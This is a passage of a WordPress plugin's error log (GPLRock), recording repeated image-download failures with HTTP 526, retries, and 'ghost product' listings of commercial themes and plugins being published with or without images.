https://meldwp.com/wp-content/uploads/milzincard-resume--cv--portfolio-vcard-wordpress-theme-12319.webp for product milzincard-resume-cv-portfolio-vcard-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:36:10 UTC] GPLRock WARNING: Image download failed for product milzincard-resume-cv-portfolio-vcard-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/milzincard-resume--cv--portfolio-vcard-wordpress-theme-12319.webp [06-Apr-2026 12:36:10 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: milzincard-resume-cv-portfolio-vcard-wordpress-theme [06-Apr-2026 12:36:10 UTC] GPLRock: Image download failed for product home-shop-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:36:12 UTC] GPLRock: Image download failed for product home-shop-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:36:15 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/home-shop---woocommerce-theme-33481.webp for product home-shop-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:36:15 UTC] GPLRock: Image download failed for product home-shop-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:36:17 UTC] GPLRock: Image download failed for product home-shop-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:36:19 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/home-shop---woocommerce-theme-33481.webp for product home-shop-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:36:19 UTC] GPLRock WARNING: Image download failed for product home-shop-woocommerce-theme. URL: https://meldwp.com/wp-content/uploads/home-shop---woocommerce-theme-33481.webp [06-Apr-2026 12:36:19 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: home-shop-woocommerce-theme [06-Apr-2026 14:46:54 UTC] GPLRock: Image downloaded successfully for product chauffeur-taxi-booking-system-for-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b730135c.jpg [06-Apr-2026 14:46:54 UTC] GPLRock: Using pre-downloaded image for product chauffeur-taxi-booking-system-for-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b730135c.jpg [06-Apr-2026 14:46:54 UTC] GPLRock: Ghost product published with image - Product ID: chauffeur-taxi-booking-system-for-wordpress [06-Apr-2026 14:46:56 UTC] GPLRock: Image downloaded successfully for product love-travel-creative-travel-agency-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a8143d99.jpg [06-Apr-2026 14:46:56 UTC] GPLRock: Using pre-downloaded image for product love-travel-creative-travel-agency-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a8143d99.jpg [06-Apr-2026 14:46:56 UTC] GPLRock: Ghost product published with image - Product ID: love-travel-creative-travel-agency-wordpress [06-Apr-2026 14:46:57 UTC] GPLRock: Image downloaded successfully for product wordpress-woocommerce-scraper-plugin-import-data-from-any-website (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5dd0713b.jpg [06-Apr-2026 14:46:57 UTC] GPLRock: Using pre-downloaded image for product wordpress-woocommerce-scraper-plugin-import-data-from-any-website: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5dd0713b.jpg [06-Apr-2026 14:46:57 UTC] GPLRock: Ghost product published with image - Product ID: wordpress-woocommerce-scraper-plugin-import-data-from-any-website [06-Apr-2026 14:46:59 UTC] GPLRock: Image downloaded successfully for product hadkaur-fitness-and-gym-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-67587179.jpg [06-Apr-2026 14:46:59 UTC] GPLRock: Using pre-downloaded image for product hadkaur-fitness-and-gym-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-67587179.jpg [06-Apr-2026 14:46:59 UTC] GPLRock: Ghost product published with image - Product ID: hadkaur-fitness-and-gym-wordpress-theme [06-Apr-2026 14:47:01 UTC] GPLRock: Image downloaded successfully for product hellix-modern-architecture-interior-design-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-42cd237d.jpg [06-Apr-2026 14:47:01 UTC] GPLRock: Using pre-downloaded image for product hellix-modern-architecture-interior-design-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-42cd237d.jpg [06-Apr-2026 14:47:01 UTC] GPLRock: Ghost product published with image - Product ID: hellix-modern-architecture-interior-design-wordpress-theme [06-Apr-2026 14:47:02 UTC] GPLRock: Image downloaded successfully for product syngenic-solar-renewable-energy-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-0194bd97.webp [06-Apr-2026 14:47:02 UTC] GPLRock: Using pre-downloaded image for product syngenic-solar-renewable-energy-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-0194bd97.webp [06-Apr-2026 14:47:02 UTC] GPLRock: Ghost product published with image - Product ID: syngenic-solar-renewable-energy-elementor-template-kit [06-Apr-2026 14:47:04 UTC] GPLRock: Image downloaded successfully for product callisto-seo-digital-marketing-agency-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-01937d38.webp [06-Apr-2026 14:47:04 UTC] GPLRock: Using pre-downloaded image for product callisto-seo-digital-marketing-agency-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-01937d38.webp [06-Apr-2026 14:47:04 UTC] GPLRock: Ghost product published with image - Product ID: callisto-seo-digital-marketing-agency-elementor-template-kit [06-Apr-2026 14:47:05 UTC] GPLRock: Image downloaded successfully for product bizicorp-business-consulting-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6e7bd5ca.webp [06-Apr-2026 14:47:05 UTC] GPLRock: Using pre-downloaded image for product bizicorp-business-consulting-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6e7bd5ca.webp [06-Apr-2026 14:47:05 UTC] GPLRock: Ghost product published with image - Product ID: bizicorp-business-consulting-elementor-template-kit [06-Apr-2026 14:47:07 UTC] GPLRock: Image downloaded successfully for product choicy-digital-marketing-agency-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-df919590.jpg [06-Apr-2026 14:47:07 UTC] GPLRock: Using pre-downloaded image for product choicy-digital-marketing-agency-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-df919590.jpg [06-Apr-2026 14:47:07 UTC] GPLRock: Ghost product published with image - Product ID: choicy-digital-marketing-agency-wordpress-theme [06-Apr-2026 14:47:09 UTC] GPLRock: Image downloaded successfully for product maharatri-hindu-temple-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ad7a9087.jpg [06-Apr-2026 14:47:09 UTC] GPLRock: Using pre-downloaded image for product maharatri-hindu-temple-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ad7a9087.jpg [06-Apr-2026 14:47:09 UTC] GPLRock: Ghost product published with image - Product ID: maharatri-hindu-temple-wordpress-theme [06-Apr-2026 17:24:39 UTC] GPLRock: Image downloaded successfully for product wpmu-dev-private-messaging (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-827202cb.jpg [06-Apr-2026 17:24:39 UTC] GPLRock: Using pre-downloaded image for product wpmu-dev-private-messaging: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-827202cb.jpg [06-Apr-2026 17:24:39 UTC] GPLRock: Ghost product published with image - Product ID: wpmu-dev-private-messaging [06-Apr-2026 17:24:40 UTC] GPLRock: Image downloaded successfully for product white-label-wordpress-plugin-wpalter (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b090a621.jpg [06-Apr-2026 17:24:40 UTC] GPLRock: Using pre-downloaded image for product white-label-wordpress-plugin-wpalter: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b090a621.jpg [06-Apr-2026 17:24:40 UTC] GPLRock: Ghost product published with image - Product ID: white-label-wordpress-plugin-wpalter [06-Apr-2026 17:24:42 UTC] GPLRock: Image downloaded successfully for product mythemeshop-wp-real-estate-pro (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8bd09f30.jpg [06-Apr-2026 17:24:42 UTC] GPLRock: Using pre-downloaded image for product mythemeshop-wp-real-estate-pro: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8bd09f30.jpg [06-Apr-2026 17:24:42 UTC] GPLRock: Ghost product published with image - Product ID: mythemeshop-wp-real-estate-pro [06-Apr-2026 17:24:44 UTC] GPLRock: Image downloaded successfully for product easy-digital-downloads-paypal-adaptive-payments (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-632f7ed5.jpg [06-Apr-2026 17:24:44 UTC] GPLRock: Using pre-downloaded image for product easy-digital-downloads-paypal-adaptive-payments: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-632f7ed5.jpg [06-Apr-2026 17:24:44 UTC] GPLRock: Ghost product published with image - Product ID: easy-digital-downloads-paypal-adaptive-payments [06-Apr-2026 17:24:45 UTC] GPLRock: Image downloaded successfully for product studiopress-academy-pro-genesis-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3d65c7ec.jpg [06-Apr-2026 17:24:45 UTC] GPLRock: Using pre-downloaded image for product studiopress-academy-pro-genesis-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3d65c7ec.jpg [06-Apr-2026 17:24:46 UTC] GPLRock: Ghost product published with image - Product ID: studiopress-academy-pro-genesis-wordpress-theme [06-Apr-2026 17:24:48 UTC] GPLRock: Image downloaded successfully for product easy-digital-downloads-2checkout-payment-gateway (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-64033420.jpg [06-Apr-2026 17:24:48 UTC] GPLRock: Using pre-downloaded image for product easy-digital-downloads-2checkout-payment-gateway: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-64033420.jpg [06-Apr-2026 17:24:50 UTC] GPLRock: Ghost product published with image - Product ID: easy-digital-downloads-2checkout-payment-gateway [06-Apr-2026 17:24:53 UTC] GPLRock: Image downloaded successfully for product soliloquy-woocommerce-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ced3a617.jpg [06-Apr-2026 17:24:54 UTC] GPLRock: Using pre-downloaded image for product soliloquy-woocommerce-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ced3a617.jpg [06-Apr-2026 17:24:54 UTC] GPLRock: Ghost product published with image - Product ID: soliloquy-woocommerce-addon [06-Apr-2026 17:24:55 UTC] GPLRock: Image downloaded successfully for product studiopress-workstation-pro-genesis-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-72a274c4.jpg [06-Apr-2026 17:24:55 UTC] GPLRock: Using pre-downloaded image for product studiopress-workstation-pro-genesis-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-72a274c4.jpg [06-Apr-2026 17:24:55 UTC] GPLRock: Ghost product published with image - Product ID: studiopress-workstation-pro-genesis-wordpress-theme [06-Apr-2026 17:24:57 UTC] GPLRock: Image downloaded successfully for product studiopress-refined-pro-genesis-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-fe53156a.jpg [06-Apr-2026 17:24:57 UTC] GPLRock: Using pre-downloaded image for product studiopress-refined-pro-genesis-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-fe53156a.jpg [06-Apr-2026 17:24:57 UTC] GPLRock: Ghost product published with image - Product ID: studiopress-refined-pro-genesis-wordpress-theme [06-Apr-2026 17:24:59 UTC] GPLRock: Image downloaded successfully for product css-igniter-potenza-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6919b7f3.jpg [06-Apr-2026 17:24:59 UTC] GPLRock: Using pre-downloaded image for product css-igniter-potenza-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6919b7f3.jpg [06-Apr-2026 17:24:59 UTC] GPLRock: Ghost product published with image - Product ID: css-igniter-potenza-wordpress-theme [06-Apr-2026 17:34:14 UTC] GPLRock: Image download failed for product wp-story-premium-instagram-style-stories-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 17:34:16 UTC] GPLRock: Image download failed for product wp-story-premium-instagram-style-stories-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 17:34:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wp-story-premium---instagram-style-stories-for-wordpress-7662.webp for product wp-story-premium-instagram-style-stories-for-wordpress after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 17:34:18 UTC] GPLRock: Image download failed for product wp-story-premium-instagram-style-stories-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 17:34:20 UTC] GPLRock: Image download failed for product wp-story-premium-instagram-style-stories-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 17:34:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wp-story-premium---instagram-style-stories-for-wordpress-7662.webp for product wp-story-premium-instagram-style-stories-for-wordpress after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 17:34:22 UTC] GPLRock WARNING: Image download failed for product wp-story-premium-instagram-style-stories-for-wordpress. URL: https://meldwp.com/wp-content/uploads/wp-story-premium---instagram-style-stories-for-wordpress-7662.webp [06-Apr-2026 17:34:22 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wp-story-premium-instagram-style-stories-for-wordpress [06-Apr-2026 17:34:22 UTC] GPLRock: Image download failed for product image-toggle-addon-for-wpbakery-page-builder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 17:34:25 UTC] GPLRock: Image download failed for product image-toggle-addon-for-wpbakery-page-builder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 17:34:27 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/image-toggle---addon-for-wpbakery-page-builder-23995.webp for product image-toggle-addon-for-wpbakery-page-builder after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 17:34:27 UTC] GPLRock: Image download failed for product image-toggle-addon-for-wpbakery-page-builder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 17:34:29 UTC] GPLRock: Image download failed for product image-toggle-addon-for-wpbakery-page-builder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 17:34:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/image-toggle---addon-for-wpbakery-page-builder-23995.webp for product image-toggle-addon-for-wpbakery-page-builder after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 17:34:31 UTC] GPLRock WARNING: Image download failed for product image-toggle-addon-for-wpbakery-page-builder. URL: https://meldwp.com/wp-content/uploads/image-toggle---addon-for-wpbakery-page-builder-23995.webp [06-Apr-2026 17:34:31 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: image-toggle-addon-for-wpbakery-page-builder [06-Apr-2026 17:34:31 UTC] GPLRock: Image downloaded successfully for product google-maps-neighborhood-walker-for-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-99967178.webp [06-Apr-2026 17:34:31 UTC] GPLRock: Using pre-downloaded image for product google-maps-neighborhood-walker-for-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-99967178.webp [06-Apr-2026 17:34:31 UTC] GPLRock: Ghost product published with image - Product ID: google-maps-neighborhood-walker-for-wordpress [06-Apr-2026 17:34:31 UTC] GPLRock: Image download failed for product crypto-swap-cryptocurrency-exchange-script-and-widget-on-ethereum-blockchain (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 17:34:33 UTC] GPLRock: Image download failed for product crypto-swap-cryptocurrency-exchange-script-and-widget-on-ethereum-blockchain (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 17:34:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/crypto-swap---cryptocurrency-exchange-script-and-widget-on-ethereum-blockchain-18929.webp for product crypto-swap-cryptocurrency-exchange-script-and-widget-on-ethereum-blockchain after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 17:34:36 UTC] GPLRock: Image download failed for product crypto-swap-cryptocurrency-exchange-script-and-widget-on-ethereum-blockchain (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 17:34:38 UTC] GPLRock: Image download failed for product crypto-swap-cryptocurrency-exchange-script-and-widget-on-ethereum-blockchain (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 17:34:40 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/crypto-swap---cryptocurrency-exchange-script-and-widget-on-ethereum-blockchain-18929.webp for product crypto-swap-cryptocurrency-exchange-script-and-widget-on-ethereum-blockchain after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 17:34:40 UTC] GPLRock WARNING: Image download failed for product crypto-swap-cryptocurrency-exchange-script-and-widget-on-ethereum-blockchain. URL: https://meldwp.com/wp-content/uploads/crypto-swap---cryptocurrency-exchange-script-and-widget-on-ethereum-blockchain-18929.webp [06-Apr-2026 17:34:40 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: crypto-swap-cryptocurrency-exchange-script-and-widget-on-ethereum-blockchain [06-Apr-2026 17:34:40 UTC] GPLRock: Image download failed for product vip-shop-advanced-woocommerce-vip-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 17:34:42 UTC] GPLRock: Image download failed for product vip-shop-advanced-woocommerce-vip-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 17:34:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/vip-shop--advanced-woocommerce-vip-plugin-8396.webp for product vip-shop-advanced-woocommerce-vip-plugin after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 17:34:44 UTC] GPLRock: Image download failed for product vip-shop-advanced-woocommerce-vip-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 17:34:46 UTC] GPLRock: Image download failed for product vip-shop-advanced-woocommerce-vip-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 17:34:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/vip-shop--advanced-woocommerce-vip-plugin-8396.webp for product vip-shop-advanced-woocommerce-vip-plugin after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 17:34:48 UTC] GPLRock WARNING: Image download failed for product vip-shop-advanced-woocommerce-vip-plugin. URL: https://meldwp.com/wp-content/uploads/vip-shop--advanced-woocommerce-vip-plugin-8396.webp [06-Apr-2026 17:34:48 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: vip-shop-advanced-woocommerce-vip-plugin [06-Apr-2026 17:34:49 UTC] GPLRock: Image download failed for product fliptimer-addon-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 17:34:51 UTC] GPLRock: Image download failed for product fliptimer-addon-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 17:34:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/fliptimer---addon-for-elementor-3016.webp for product fliptimer-addon-for-elementor after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 17:34:53 UTC] GPLRock: Image download failed for product fliptimer-addon-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 17:34:55 UTC] GPLRock: Image download failed for product fliptimer-addon-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 17:34:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/fliptimer---addon-for-elementor-3016.webp for product fliptimer-addon-for-elementor after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 17:34:57 UTC] GPLRock WARNING: Image download failed for product fliptimer-addon-for-elementor. URL: https://meldwp.com/wp-content/uploads/fliptimer---addon-for-elementor-3016.webp [06-Apr-2026 17:34:57 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: fliptimer-addon-for-elementor [06-Apr-2026 17:34:57 UTC] GPLRock: Image download failed for product hide-price-product-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 17:34:59 UTC] GPLRock: Image download failed for product hide-price-product-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 17:35:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/hide-price-product-for-woocommerce-10531.webp for product hide-price-product-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 17:35:02 UTC] GPLRock: Image download failed for product hide-price-product-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 17:35:04 UTC] GPLRock: Image download failed for product hide-price-product-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 17:35:06 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/hide-price-product-for-woocommerce-10531.webp for product hide-price-product-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 17:35:06 UTC] GPLRock WARNING: Image download failed for product hide-price-product-for-woocommerce. URL: https://meldwp.com/wp-content/uploads/hide-price-product-for-woocommerce-10531.webp [06-Apr-2026 17:35:06 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: hide-price-product-for-woocommerce [06-Apr-2026 17:35:06 UTC] GPLRock: Image downloaded successfully for product elementor-ultimate-bundle-one (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f0d5b477.webp [06-Apr-2026 17:35:06 UTC] GPLRock: Using pre-downloaded image for product elementor-ultimate-bundle-one: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f0d5b477.webp [06-Apr-2026 17:35:06 UTC] GPLRock: Ghost product published with image - Product ID: elementor-ultimate-bundle-one [06-Apr-2026 17:35:06 UTC] GPLRock: Image download failed for product post-grid-addon-wpbakery-page-builder-formerly-visual-composer (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 17:35:08 UTC] GPLRock: Image download failed for product post-grid-addon-wpbakery-page-builder-formerly-visual-composer (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 17:35:10 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/post-grid---addon-wpbakery-page-builder-formerly-visual-composer-5438.webp for product post-grid-addon-wpbakery-page-builder-formerly-visual-composer after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 17:35:10 UTC] GPLRock: Image download failed for product post-grid-addon-wpbakery-page-builder-formerly-visual-composer (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 17:35:13 UTC] GPLRock: Image download failed for product post-grid-addon-wpbakery-page-builder-formerly-visual-composer (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 17:35:15 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/post-grid---addon-wpbakery-page-builder-formerly-visual-composer-5438.webp for product post-grid-addon-wpbakery-page-builder-formerly-visual-composer after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 17:35:15 UTC] GPLRock WARNING: Image download failed for product post-grid-addon-wpbakery-page-builder-formerly-visual-composer. URL: https://meldwp.com/wp-content/uploads/post-grid---addon-wpbakery-page-builder-formerly-visual-composer-5438.webp [06-Apr-2026 17:35:15 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: post-grid-addon-wpbakery-page-builder-formerly-visual-composer [06-Apr-2026 17:35:15 UTC] GPLRock: Image download failed for product accordion-for-wpbakery-page-builder-formerly-visual-composer (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 17:35:17 UTC] GPLRock: Image download failed for product accordion-for-wpbakery-page-builder-formerly-visual-composer (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 17:35:19 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/accordion-for-wpbakery-page-builder-formerly-visual-composer-5062.webp for product accordion-for-wpbakery-page-builder-formerly-visual-composer after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 17:35:19 UTC] GPLRock: Image download failed for product accordion-for-wpbakery-page-builder-formerly-visual-composer (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 17:35:21 UTC] GPLRock: Image download failed for product accordion-for-wpbakery-page-builder-formerly-visual-composer (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 17:35:23 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/accordion-for-wpbakery-page-builder-formerly-visual-composer-5062.webp for product accordion-for-wpbakery-page-builder-formerly-visual-composer after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 17:35:23 UTC] GPLRock WARNING: Image download failed for product accordion-for-wpbakery-page-builder-formerly-visual-composer. URL: https://meldwp.com/wp-content/uploads/accordion-for-wpbakery-page-builder-formerly-visual-composer-5062.webp [06-Apr-2026 17:35:23 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: accordion-for-wpbakery-page-builder-formerly-visual-composer [06-Apr-2026 17:42:26 UTC] GPLRock: Image download failed for product ember-digital-marketing-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 17:42:28 UTC] GPLRock: Image download failed for product ember-digital-marketing-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 17:42:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ember---digital-marketing-agency-wordpress-theme-9945.webp for product ember-digital-marketing-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 17:42:30 UTC] GPLRock: Image download failed for product ember-digital-marketing-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 17:42:32 UTC] GPLRock: Image download failed for product ember-digital-marketing-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 17:42:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ember---digital-marketing-agency-wordpress-theme-9945.webp for product ember-digital-marketing-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 17:42:34 UTC] GPLRock WARNING: Image download failed for product ember-digital-marketing-agency-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/ember---digital-marketing-agency-wordpress-theme-9945.webp [06-Apr-2026 17:42:34 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ember-digital-marketing-agency-wordpress-theme [06-Apr-2026 17:42:34 UTC] GPLRock: Image download failed for product muji-beauty-shop-spa-salon-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 17:42:36 UTC] GPLRock: Image download failed for product muji-beauty-shop-spa-salon-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 17:42:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/muji--beauty-shop--spa-salon-wordpress-theme-23463.webp for product muji-beauty-shop-spa-salon-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 17:42:39 UTC] GPLRock: Image download failed for product muji-beauty-shop-spa-salon-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 17:42:41 UTC] GPLRock: Image download failed for product muji-beauty-shop-spa-salon-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 17:42:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/muji--beauty-shop--spa-salon-wordpress-theme-23463.webp for product muji-beauty-shop-spa-salon-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 17:42:43 UTC] GPLRock WARNING: Image download failed for product muji-beauty-shop-spa-salon-wordpress-theme. URL: 